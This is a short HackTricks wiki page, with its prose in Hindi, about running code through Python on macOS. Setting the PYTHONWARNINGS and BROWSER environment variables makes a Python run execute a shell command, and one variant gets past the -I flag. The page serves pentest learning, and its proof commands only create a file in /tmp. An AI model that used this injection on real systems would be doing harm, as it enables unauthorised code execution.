mirror of
https://github.com/HackTricks-wiki/hacktricks.git
synced 2025-10-10 18:36:50 +00:00
1000 B
1000 B
macOS Python Applications Injection
{{#include ../../../banners/hacktricks-training.md}}
PYTHONWARNINGS
और BROWSER
पर्यावरण चर के माध्यम से
यह संभव है कि दोनों पर्यावरण चर को इस तरह से बदलें कि जब भी python को कॉल किया जाए, मनचाहा कोड निष्पादित हो, उदाहरण के लिए:
# Generate example python script
echo "print('hi')" > /tmp/script.py
# RCE which will generate file /tmp/hacktricks
PYTHONWARNINGS="all:0:antigravity.x:0:0" BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 /tmp/script.py
# RCE which will generate file /tmp/hacktricks bypassing "-I" injecting "-W" before the script to execute
BROWSER="/bin/sh -c 'touch /tmp/hacktricks' #%s" python3 -I -W all:0:antigravity.x:0:0 /tmp/script.py
{{#include ../../../banners/hacktricks-training.md}}